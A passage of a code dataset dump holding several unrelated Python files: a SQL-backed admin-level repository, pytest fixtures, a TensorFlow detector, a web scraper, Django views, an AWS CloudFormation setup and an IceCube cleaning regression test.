text(20))\".format(self.Name))\n self.Database.Commit()\n\n def Create(self, user_uuid: str, level: UserLevel) -> UserLevel:\n result = None\n if self.Exists(user_uuid) is not True:\n level.DateCreated = dt.datetime.now()\n expired = str(level.Expired.timestamp())\n assigned_date = str(level.Assigned.timestamp())\n date_created = str(level.DateCreated.timestamp())\n stmt = self.Database.Execute(\n \"INSERT INTO {0} (user_uuid, admin_level,status,expired_date,date_assigned,date_created) \"\n \"VALUES (?,?,?,?,?,?)\".format(self.Name),\n (user_uuid, level.Level, level.Status, expired, assigned_date, date_created))\n result = copy.deepcopy(level)\n self.Database.Commit()\n return result\n\n def ParseRecord(self, record:SQLResult):\n level:UserLevel = None\n if record is not None:\n level:UserLevel = UserLevel(user_uuid= record.Get('user_uuid'), status= record.Get('status'))\n level.DateCreated = record.Get('date_created')\n level.Assigned = record.Get('assigned_date')\n level.Expired = record.Get('expired_date')\n level.Level = record.Get('admin_level')\n return level\n\n\n def IsAdmin(self, user_uid: str) -> bool:\n status = False\n if type(user_uid) == str:\n user_level:UserLevel = self.Get(user_uid)\n if user_level is not None:\n if(user_level.Level == AdminLevelType.SITE_ADMINISTRATION_LEVEL) or\\\n (user_level.Level == AdminLevelType.DEVELOPER_ADMINISTRATOR_LEVEL):\n status = True\n return status\n\n def Get(self, user_uuid:str) -> UserLevel:\n level: UserLevel = None\n\n if type(user_uuid) == str:\n stmt = self.Database.Execute(\"SELECT *FROM {0} WHERE (user_uuid =?)\".format(self.Name), (user_uuid,))\n if stmt.RowCount > 0:\n record = stmt.Next\n level: UserLevel = self.ParseRecord(record)\n return level\n\n def Update(self,user_uuid:str, user_level: UserLevel) -> bool:\n status = False\n if (isinstance(user_level, UserLevel) is True) and (self.Exists(user_uuid) is True):\n\n self.Database.Execute(\"UPDATE {0} set (admin_level=?, assigned_date=?, status=?, expired_date=?) where (user_uuid=?)\".format(self.Name),\n (user_level.Level, str(user_level.Assigned.timestamp()), status, str(user_level.Expired.timestamp()), user_uuid))\n self.Database.Commit()\n status = True\n return status\n\n def Exists(self, user_uuid: str):\n status = False\n if type(user_uuid) == str:\n stmt = self.Database.Execute(\"SELECT * FROM {0} WHERE (user_uuid=?)\".format(self.Name), (user_uuid,))\n if stmt is not None:\n if stmt.RowCount > 0:\n status = True\n return status\n\n\nif __name__ == \"__main__\":\n repo = AdministratorLevelRepository(db=Database(name=\"../server/dbtest.db\"))\n\n level = UserLevel(user_uuid=\"9087890876\", status=AdminLevelStatusType.NORMAL,\n admin_level=AdminLevelType.DEVELOPER_ADMINISTRATOR_LEVEL)\n result = repo.Create(\"9087890876\", level)\n print(result)\n\n repo.Database.Close()\n","sub_path":"accounts/repositories/administrationlevelrepository.py","file_name":"administrationlevelrepository.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"144218677","text":"\"\"\"Pytest fixtures for main test suite.\"\"\"\nimport os\n\nimport pytest\n\nfrom pycounter import csvhelper\nfrom pycounter import report\nimport pycounter.sushi\n\n\ndef parsedata(filename):\n \"\"\"Helper function returns a report from a filename relative to data directory.\"\"\"\n return report.parse(os.path.join(os.path.dirname(__file__), \"data\", filename))\n\n\n@pytest.fixture(\n params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\", \"C4JR1_bad.csv\", \"C4JR1GOA.csv\"]\n)\ndef csv_jr1_report(request):\n \"\"\"Various CSV format JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"simpleJR1.tsv\", \"tsvC4JR1\"])\ndef tsv_jr1(request):\n \"\"\"TSV file\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\", \"C4JR1_bad.csv\"])\ndef csv_jr1_report_std(request):\n \"\"\"Standard (non-GOA) JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"simpleJR1.csv\"])\ndef csv_jr1_report_common_data(request):\n \"\"\"JR1 reports with shared common data we can make assertions about.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"csvC4JR1\", \"C4JR1.csv\", \"C4JR1_bad.csv\"])\ndef csv_jr1_r4_report(request):\n \"\"\"Revision 4 JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"JR1.xlsx\", \"JR1_bad.xlsx\", \"xlsxJR1\"])\ndef jr1_report_xlsx(request):\n \"\"\"Excel formatted JR1 reports.\"\"\"\n return parsedata(request.param)\n\n\ndef parse_sushi_file(filename):\n \"\"\"Turn SUSHI data file into a report.\"\"\"\n # pylint: disable= protected-access\n with open(os.path.join(os.path.dirname(__file__), \"data\", filename)) as datafile:\n return pycounter.sushi.raw_to_full(datafile.read())\n\n\n@pytest.fixture(\n params=[\n \"sushi_simple.xml\",\n \"sushi_simple_no_customer.xml\",\n \"sushi_simple_br1.xml\",\n \"sushi_simple_db1.xml\",\n \"sushi_db1_missing_record_view.xml\",\n ]\n)\ndef sushi_report_all(request):\n \"\"\"Report from SUSHI, shared common data.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(\n params=[\n \"sushi_simple.xml\",\n \"sushi_simple_br1.xml\",\n \"sushi_simple_db1.xml\",\n \"sushi_db1_missing_record_view.xml\",\n ]\n)\ndef sushi_report_with_customer(request):\n \"\"\"Report from SUSHI, shared common data with customer set.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(params=[\"sushi_simple_no_customer.xml\"])\ndef sushi_report_no_customer(request):\n \"\"\"Report from SUSHI, shared common data with customer not set.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(params=[\"sushi_simple.xml\", \"sushi_simple_no_customer.xml\"])\ndef sushi_report_jr1(request):\n \"\"\"Report from SUSHI, shared common data, JR1 only.\"\"\"\n return parse_sushi_file(request.param)\n\n\n@pytest.fixture(\n params=[\n \"C4BR1.tsv\",\n \"C4DB1.tsv\",\n \"C4JR1.csv\",\n \"C4BR2.tsv\",\n \"C4DB2.tsv\",\n \"C4JR1mul.csv\",\n ]\n)\ndef common_output(request):\n \"\"\"Common data for output.\"\"\"\n delim = {\"tsv\": \"\\t\", \"csv\": \",\"}[request.param.split(\".\")[1]]\n filename = os.path.join(os.path.dirname(__file__), \"data\", request.param)\n with csvhelper.UnicodeReader(filename, delimiter=delim) as report_reader:\n content = list(report_reader)\n return parsedata(request.param).as_generic(), content\n\n\n@pytest.fixture(params=[\"simpleBR1.csv\", \"simpleBR2.csv\"])\ndef br_c1(request):\n \"\"\"Version 1 (COUNTER 3) book reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"C4BR2.tsv\", \"C4BR1.tsv\", \"simpleBR1.csv\", \"simpleBR2.csv\"])\ndef all_book_reports(request):\n \"\"\"All book reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture(params=[\"C4BR1.tsv\", \"simpleJR1.tsv\"])\ndef report_file_output(request):\n \"\"\"Reports with their expected output.\"\"\"\n rpt = parsedata(request.param)\n with open(\n os.path.join(os.path.dirname(__file__), \"data\", request.param), \"rb\"\n ) as f:\n expected_data = f.read()\n return rpt, expected_data\n\n\n@pytest.fixture(params=[\"C4DB1.tsv\", \"C4DB2.tsv\"])\ndef db_report(request):\n \"\"\"All C4 database reports.\"\"\"\n return parsedata(request.param)\n\n\n@pytest.fixture\ndef br3_report():\n \"\"\"Book report 3 (turnaways).\"\"\"\n return parsedata(\"C4BR3.csv\")\n\n\n@pytest.fixture\ndef jr2_report():\n \"\"\"Journal report 2 (turnaways).\"\"\"\n return parsedata(\"C4JR2.csv\")\n","sub_path":"pycounter/test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330091027","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nimport numpy as np\nimport os\nfrom util import s3\nfrom PIL import Image\nimport tensorflow as tf\nfrom object_detection.utils import visualization_utils as vis_util\nfrom stylelens_feature.feature_extract import ExtractFeature\nfrom bluelens_log import Logging\n\nimport io\nfrom util import label_map_util\n\nTMP_CROP_IMG_FILE = './tmp.jpg'\n\nNUM_CLASSES = 2\n\nAWS_BUCKET = 'bluelens-style-model'\nAWS_BUCKET_FOLDER = 'object_detection'\nMODEL_TYPE = 'top_full'\nAWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY']\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\nRELEASE_MODE = os.environ['RELEASE_MODE']\nFEATURE_GRPC_HOST = os.environ['FEATURE_GRPC_HOST']\nFEATURE_GRPC_PORT = os.environ['FEATURE_GRPC_PORT']\nOD_GRPC_HOST = os.environ['FEATURE_GRPC_HOST']\nOD_GRPC_PORT = os.environ['FEATURE_GRPC_PORT']\nOD_SCORE_MIN = float(os.environ['OD_SCORE_MIN'])\nGPU_NUM = os.environ['GPU_NUM']\nGPU = '/device:GPU:' + GPU_NUM\n\nMODEL_FILE = 'frozen_inference_graph.pb'\nLABEL_MAP_FILE = 'label_map.pbtxt'\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='bl-detect:AllObjectDetect')\nstorage = s3.S3(AWS_ACCESS_KEY, AWS_SECRET_ACCESS_KEY)\n\nclass TopFullObjectDetect(object):\n def __init__(self):\n label_map_file = self.load_labelemap()\n label_map = label_map_util.load_labelmap(label_map_file)\n log.debug(label_map)\n categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES,\n use_display_name=True)\n self.__category_index = label_map_util.create_category_index(categories)\n self.__detection_graph = tf.Graph()\n self.__feature_extractor = ExtractFeature(use_gpu=True)\n model_file = self.load_model()\n with self.__detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(model_file, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n with tf.device(GPU):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.__sess = tf.Session(config=config, graph=self.__detection_graph)\n\n log.info('_init_ done')\n\n def load_labelemap(self):\n log.info('load_labelmap')\n file = os.path.join(os.getcwd(), LABEL_MAP_FILE)\n key = os.path.join(AWS_BUCKET_FOLDER, RELEASE_MODE, MODEL_TYPE, LABEL_MAP_FILE)\n print(key)\n try:\n return storage.download_file_from_bucket(AWS_BUCKET, file, key)\n except:\n log.error('download error')\n return None\n\n def load_model(self):\n log.info('load_model')\n file = os.path.join(os.getcwd(), MODEL_FILE)\n key = os.path.join(AWS_BUCKET_FOLDER, RELEASE_MODE, MODEL_TYPE, MODEL_FILE)\n print(key)\n try:\n return storage.download_file_from_bucket(AWS_BUCKET, file, key)\n except:\n log.error('download error')\n return None\n\n def detect(self, image_bytes):\n\n image_data = Image.open(io.BytesIO(image_bytes))\n image_np = self.load_image_into_numpy_array(image_data)\n\n show_box = False\n out_image, boxes, scores, classes, num_detections = self.detect_objects(image_np, self.__sess, self.__detection_graph, show_box)\n\n out_boxes = self.take_object(\n out_image,\n np.squeeze(boxes),\n np.squeeze(scores),\n np.squeeze(classes).astype(np.int32))\n\n # log.debug(out_boxes)\n return out_boxes\n\n def take_object(self, image_np, boxes, scores, classes):\n max_boxes_to_save = 3\n taken_boxes = []\n if not max_boxes_to_save:\n max_boxes_to_save = boxes.shape[0]\n for i in range(min(max_boxes_to_save, boxes.shape[0])):\n if scores is None or scores[i] > OD_SCORE_MIN:\n print(scores[i])\n if classes[i] in self.__category_index.keys():\n class_name = self.__category_index[classes[i]]['name']\n class_code = str(self.__category_index[classes[i]]['id'])\n else:\n class_name = 'na'\n class_code = 'na'\n ymin, xmin, ymax, xmax = tuple(boxes[i].tolist())\n\n use_normalized_coordinates = True\n image_pil = Image.fromarray(np.uint8(image_np)).convert('RGB')\n\n left, right, top, bottom = self.crop_bounding_box(\n image_pil,\n ymin,\n xmin,\n ymax,\n xmax,\n use_normalized_coordinates=use_normalized_coordinates)\n\n feature_vector = self.extract_feature(image_pil, left, right, top, bottom)\n item = {}\n\n item['box'] = [left, right, top, bottom]\n item['class_name'] = class_name\n #class_code==1(top), class_code==2(full)\n if class_code == '1':\n item['class_code'] = '1'\n elif class_code == '2':\n item['class_code'] = '3'\n else:\n item['class_code'] = class_code\n item['score'] = scores[i]\n item['feature'] = feature_vector\n taken_boxes.append(item)\n return taken_boxes\n\n def extract_feature(self, image, left, right, top, bottom):\n area = (left, top, left + abs(left-right), top + abs(bottom-top))\n cropped_img = image.crop(area)\n cropped_img.save(TMP_CROP_IMG_FILE)\n # cimage = io.BytesIO()\n # cropped_img.save(cimage, format='JPEG')\n # cimage.seek(0) # rewind to the start\n # cimage = Image.open(cimage)\n feature = self.__feature_extractor.extract_feature(TMP_CROP_IMG_FILE)\n return feature\n\n def load_image_into_numpy_array(self, image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n def crop_bounding_box(self,\n image,\n ymin,\n xmin,\n ymax,\n xmax,\n use_normalized_coordinates=True):\n im_width, im_height = image.size\n # image.show()\n if use_normalized_coordinates:\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n else:\n (left, right, top, bottom) = (xmin, xmax, ymin, ymax)\n\n return left, right, top, bottom\n\n def detect_objects(self, image_np, sess, detection_graph, show_box=True):\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n\n # Each box represents a part of the image where a particular object was detected.\n boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = detection_graph.get_tensor_by_name('detection_scores:0')\n classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n # Actual detection.\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n if show_box:\n # Visualization of the results of a detection.\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n self.__category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=3,\n min_score_thresh=.05,\n line_thickness=8)\n # print(image_np)\n return image_np, boxes, scores, classes, num_detections\n","sub_path":"grpc/object_detect_top_full.py","file_name":"object_detect_top_full.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520906412","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom bs4 import re\n\nhtml = urlopen(\"http://www.chemistwarehouse.com.au/Shop-Online/587/Swisse\")\nbsObj = BeautifulSoup(html,\"html.parser\")\n#print(bsObj.prettify())\n#nameList = bsObj.findAll(\"span\",{\"class\":\"Price\"})\na_tags = bsObj.findAll(\"a\",{\"href\":re.compile(\"\\/buy\\/[0-9]*\\/[a-zA-Z0-9\\-]*\")})\nfor a in a_tags:\n print(a[\"title\"])\n price_tags = a.findAll(\"span\",{\"class\":\"Price\"})\n for price in price_tags:\n if(price.get_text()):\n print(price.get_text().strip(\" \\t\\n\\r\"))\n \n","sub_path":"code/python/findAll.py","file_name":"findAll.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"521167440","text":"import json\nimport re\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.forms import modelform_factory\nfrom django.http import Http404, HttpResponseRedirect, HttpResponseBadRequest, HttpResponseForbidden, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.db.models import Sum\n\nfrom cashflow import dauth\nfrom budget import models as budgetModels\nfrom expenses import models\n\ndef budget_overview(request):\n if request.method == 'GET':\n cost_centres = budgetModels.CostCentre.objects.order_by('name')\n budget_lines = budgetModels.BudgetLine.objects.order_by('name')\n expense_parts= models.ExpensePart.objects\n committees = {}\n for committee in budgetModels.Committee.objects.filter(id=55).order_by('name'):\n committees[committee.id] = {\n 'name': committee.name,\n 'cost_centres': {}\n }\n\n for cost_centre in cost_centres:\n committees[committee.id]['cost_centres'][cost_centre.id] = {\n 'name': cost_centre.name,\n 'budget_lines': {}\n }\n\n for budget_line in budget_lines:\n committees[committee.id]['cost_centres'][cost_centre.id]['budget_lines'][budget_line.id] = {\n 'name': budget_line.name,\n 'amount': float(budget_line.amount),\n 'spent': float(expense_parts.filter(budget_line=budget_line.id).aggregate(Sum('amount'))['amount__sum'] or 0)\n }\n\n if len(dauth.get_permissions(request.user)) > 0:\n return render(request, 'budget/overview.html', {\n 'committees': committees\n })\n else:\n raise Http404()\n","sub_path":"budget/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564570370","text":"# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nfrom lib.cloudformation import CloudFormationConfiguration, Ref, Arn, get_scenario, Arg\nfrom lib.userdata import UserData\nfrom lib.names import AWSNames\nfrom lib import aws\nfrom lib import constants as const\nfrom lib import stepfunctions as sfn\n\nkeypair = None\n\n\ndef create_config(session, domain):\n \"\"\"Create the CloudFormationConfiguration object.\"\"\"\n config = CloudFormationConfiguration('activities', domain, const.REGION)\n names = AWSNames(domain)\n\n global keypair\n keypair = aws.keypair_lookup(session)\n\n vpc_id = config.find_vpc(session)\n sgs = aws.sg_lookup_all(session, vpc_id)\n internal_subnets, _ = config.find_all_availability_zones(session)\n internal_subnets_lambda, _ = config.find_all_availability_zones(session, lambda_compatible_only=True)\n topic_arn = aws.sns_topic_lookup(session, \"ProductionMicronsMailingList\")\n event_data = {\n \"lambda-name\": \"delete_lambda\",\n \"db\": names.endpoint_db,\n \"meta-db\": names.meta,\n \"s3-index-table\": names.s3_index,\n \"id-index-table\": names.id_index,\n \"id-count-table\": names.id_count_index,\n \"cuboid_bucket\": names.cuboid_bucket,\n \"delete_bucket\": names.delete_bucket,\n \"topic-arn\": topic_arn,\n \"query-deletes-sfn-name\": names.query_deletes,\n \"delete-sfn-name\": names.delete_cuboid,\n \"delete-exp-sfn-name\": names.delete_experiment,\n \"delete-coord-frame-sfn-name\": names.delete_coord_frame,\n \"delete-coll-sfn-name\": names.delete_collection\n }\n\n role_arn = aws.role_arn_lookup(session, \"events_for_delete_lambda\")\n multi_lambda = names.multi_lambda\n lambda_arn = aws.lambda_arn_lookup(session, multi_lambda)\n target_list = [{\n \"Arn\": lambda_arn,\n \"Id\": multi_lambda,\n \"Input\": json.dumps(event_data)\n }]\n schedule_expression = \"cron(1 6-11/1 ? * TUE-FRI *)\"\n #schedule_expression = \"cron(0/2 * * * ? *)\" # testing fire every two minutes\n\n config.add_event_rule(\"DeleteEventRule\", names.delete_event_rule, role_arn=role_arn,\n schedule_expression=schedule_expression, target_list=target_list, description=None)\n # Events have to be given permission to run lambda.\n config.add_lambda_permission('DeleteRulePerm', multi_lambda, principal='events.amazonaws.com',\n source=Arn('DeleteEventRule'))\n user_data = UserData()\n user_data[\"system\"][\"fqdn\"] = names.activities\n user_data[\"system\"][\"type\"] = \"activities\"\n user_data[\"aws\"][\"db\"] = names.endpoint_db\n user_data[\"aws\"][\"cache\"] = names.cache\n user_data[\"aws\"][\"cache-state\"] = names.cache_state\n user_data[\"aws\"][\"cache-db\"] = \"0\"\n user_data[\"aws\"][\"cache-state-db\"] = \"0\"\n user_data[\"aws\"][\"meta-db\"] = names.meta\n user_data[\"aws\"][\"cuboid_bucket\"] = names.cuboid_bucket\n user_data[\"aws\"][\"tile_bucket\"] = names.tile_bucket\n user_data[\"aws\"][\"ingest_bucket\"] = names.ingest_bucket\n user_data[\"aws\"][\"s3-index-table\"] = names.s3_index\n user_data[\"aws\"][\"tile-index-table\"] = names.tile_index\n user_data[\"aws\"][\"id-index-table\"] = names.id_index\n user_data[\"aws\"][\"id-count-table\"] = names.id_count_index\n\n config.add_autoscale_group(\"Activities\",\n names.activities,\n aws.ami_lookup(session, 'activities.boss'),\n keypair,\n subnets=internal_subnets_lambda,\n type_=const.ACTIVITIES_TYPE,\n security_groups=[sgs[names.internal]],\n user_data=str(user_data),\n role=aws.instance_profile_arn_lookup(session, \"activities\"),\n min=1,\n max=1)\n\n config.add_lambda(\"IngestLambda\",\n names.ingest_lambda,\n aws.role_arn_lookup(session, 'IngestQueueUpload'),\n const.INGEST_LAMBDA,\n handler=\"index.handler\",\n timeout=60 * 5)\n\n config.add_lambda_permission(\"IngestLambdaExecute\", Ref(\"IngestLambda\"))\n\n return config\n\n\ndef generate(session, domain):\n \"\"\"Create the configuration and save it to disk\"\"\"\n config = create_config(session, domain)\n config.generate()\n\n\ndef create(session, domain):\n \"\"\"Create the configuration, launch it, and initialize Vault\"\"\"\n config = create_config(session, domain)\n\n success = config.create(session)\n if success:\n post_init(session, domain)\n\n\ndef post_init(session, domain):\n names = AWSNames(domain)\n\n sfn.create(session, names.query_deletes, domain, 'query_for_deletes.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_cuboid, domain, 'delete_cuboid.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_experiment, domain, 'delete_experiment.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_coord_frame, domain, 'delete_coordinate_frame.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.delete_collection, domain, 'delete_collection.hsd', 'StatesExecutionRole-us-east-1 ')\n #sfn.create(session, names.populate_upload_queue, domain, 'populate_upload_queue.hsd',\n # 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.ingest_queue_populate, domain, 'ingest_queue_populate.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.ingest_queue_upload, domain, 'ingest_queue_upload.hsd', 'StatesExecutionRole-us-east-1 ')\n sfn.create(session, names.resolution_hierarchy, domain, 'resolution_hierarchy.hsd', 'StatesExecutionRole-us-east-1')\n sfn.create(session, names.downsample_volume, domain, 'downsample_volume.hsd', 'StatesExecutionRole-us-east-1')\n\n\ndef delete(session, domain):\n names = AWSNames(domain)\n # DP TODO: delete activities\n CloudFormationConfiguration('activities', domain).delete(session)\n\n sfn.delete(session, names.delete_cuboid)\n sfn.delete(session, names.delete_experiment)\n sfn.delete(session, names.delete_coord_frame)\n sfn.delete(session, names.delete_collection)\n sfn.delete(session, names.query_deletes)\n sfn.delete(session, names.ingest_queue_populate)\n sfn.delete(session, names.ingest_queue_upload)\n sfn.delete(session, names.resolution_hierarchy)\n sfn.delete(session, names.downsample_volume)\n","sub_path":"cloud_formation/configs/activities.py","file_name":"activities.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192468791","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Help_for_addicts_links, Network_security_links, To_contact_us, Partners\nfrom .models import ContactInformation\nfrom django.core.validators import validate_email\n\n\ndef hello(request):\n kwargs = {}\n cont = [i for i in ContactInformation.objects.all() if i.flag]\n kwargs['phones'] = [i.phone for i in cont]\n kwargs['addicts'] = Help_for_addicts_links.objects.all()\n kwargs['security'] = Network_security_links.objects.all()\n kwargs['partners'] = Partners.objects.all()\n return render(request, 'MainPage/pomogut-page1.html', kwargs)\n\n\ndef add_the_information_about_us(request):\n try:\n validate_email(request.GET['email'])\n except:\n return HttpResponse('error')\n else:\n to = To_contact_us(email=request.GET['email'], text=request.GET['text'])\n to.save()\n return HttpResponse('done')\n# Create your views here.\n","sub_path":"MainPagePomogut/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134086075","text":"#!/usr/bin/env python \n\n\"\"\"\nThis is really not a unit test but a regression test, ensuring that this project's splitter continues\nto produce exactly the same output as the original HiveSplitter. If any change is made to the\nalgorithm this test will fail, and if the change is intentional the test data will need to be regenerated\nto put this test back on track.\nThis script can also be used to generate the testcase itself by specifying the number of output FramePackets as second argument,\n i.e. $ ./i3hivecleaningTest.py 100\n\"\"\"\nfrom icecube import icetray, dataclasses\n\nclass I3HiveCleaningVerifier(icetray.I3PacketModule):\n \"\"\"An I3Module which compares that two different cleanings produce exactly the same results\"\"\"\n def __init__(self, context):\n super(I3HiveCleaningVerifier, self).__init__(context, icetray.I3Frame.DAQ)\n self.frameCount = 0\n self.orgName = \"org\"\n self.redoName = \"redo\"\n self.pulsesName = \"MaskedOfflinePulses\"\n self.AddParameter(\"OriginalName\", \"Name of the original sub-eventstream\", self.orgName)\n self.AddParameter(\"RedoName\", \"Name of the reprocessed sub-eventstream\", self.redoName)\n self.AddOutBox(\"OutBox\")\n def Configure(self):\n self.orgName = self.GetParameter(\"OriginalName\")\n self.redoName = self.GetParameter(\"RedoName\")\n def MarkAndPush(self, frame):\n frame.Put(\"DIFF\", icetray.I3Bool(True))\n self.PushFrame(frame)\n def Physics(self, frame):\n self.frameCount+=1\n \n #next, step through the split frames in parallel and make sure that the the split pulse series are identical\n #compare these objects:\n # - RecoPulseSeries\n\n orgMap = dataclasses.I3RecoPulseSeriesMap.from_frame(frame, self.orgName)\n redoMap = dataclasses.I3RecoPulseSeriesMap.from_frame(frame, self.redoName)\n \n #should be the same number of DOMs present in both maps\n if (len(orgMap) != len(redoMap)):\n icetray.logging.log_error(\"Regression: Different numbers of hit DOMs in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(len(orgMap))+\", current=\"+str(len(redoMap)))\n self.MarkAndPush(frames)\n return\n \n #iterate over all of the DOMs and ensure that the same DOMs are hit, and have the same pulses\n for k in range(len(orgMap)):\n #check that both pulse series are for the same DOM\n orgOMKey = orgMap.keys()[k]\n redoOMKey = redoMap.keys()[k]\n if (orgOMKey != redoOMKey):\n icetray.logging.log_error(\"Regression: Missmatched DOMs in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(orgOMKey)+\", current=\"+str(redoOMKey))\n self.MarkAndPush(frames)\n return\n #check that the DOM has the same number of pulses in both series\n orgPulses = orgMap.values()[k]\n redoPulses = redoMap.values()[k]\n if (len(orgPulses) != len(redoPulses)):\n icetray.logging.log_error(\"Regression: Different numbers of hits on DOM \"+str(orgOMKey)+\" in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\":\\n\"\\\n +\" original= \"+str(len(orgPulses))+\", current=\"+str(len(redoPulses)))\n self.MarkAndPush(frames)\n return\n \n #iterate over all of the pulses and check that they are the same\n for p in range(len(orgPulses)):\n orgPulse = orgPulses[p]\n redoPulse = redoPulses[p]\n if (len(orgPulses) != len(redoPulses)):\n icetray.logging.log_error(\"Regression: Different pulse \"+str(p)+\" on DOM \"+str(orgOMKey)+\" in frame \"+str(self.frameCount)+\", split frame \"+str(frameCount)+\"!\")\n self.MarkAndPush(frames)\n return\n self.PushFrame(frame)\n\nclass FrameDelivery(icetray.I3PacketModule):\n \"\"\"A module that just deliveres a specified number of packages\"\"\"\n def __init__(self, context):\n super(FrameDelivery, self).__init__(context, icetray.I3Frame.DAQ)\n self.AddParameter(\"NRequested\", \"Deliver that many frame-packets\", 100)\n self.AddOutBox(\"OutBox\")\n def Configure(self):\n self.nrequested = self.GetParameter(\"NRequested\")\n self.ndelivered = 0\n def FramePacket(self, frames):\n if (self.ndelivered\", redo_org,\n InputName = \"MaskedOfflinePulses\",\n OutputName = redo_org,\n Stream = icetray.I3Frame.Physics)\n \nif (test):\n tray.AddModule(I3HiveCleaningVerifier,\"CleaningVerifier\")\n\n tray.AddModule(icetray.I3TestModuleFactory(TestEqual), \"TestEqual\",\n Streams=[icetray.I3Frame.DAQ])\n\nif (not test):\n tray.AddModule(\"Delete\", \"del\",\n Keys = [\"MaskedOfflinePulses_Physics\",\n \"MaskedOfflinePulses_Noise\"])\n \n tray.AddModule(FrameDelivery, \"deliver\",\n NRequested = int(sys.argv[1]))\n \n tray.AddModule(\"I3Writer\", \"Writer\",\n Filename= os.path.join(os.path.expandvars(\"$I3_BUILD\"),\"IceHive/resources/hivecleaning_testcase.i3.bz2\"),\n Streams = [icetray.I3Frame.Geometry,\n #icetray.I3Frame.Calibration,\n #icetray.I3Frame.DetectorStatus,\n icetray.I3Frame.DAQ,\n 